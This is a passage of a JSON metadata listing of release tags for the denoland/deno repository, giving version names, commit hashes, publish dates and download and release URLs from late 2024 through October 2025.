2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-0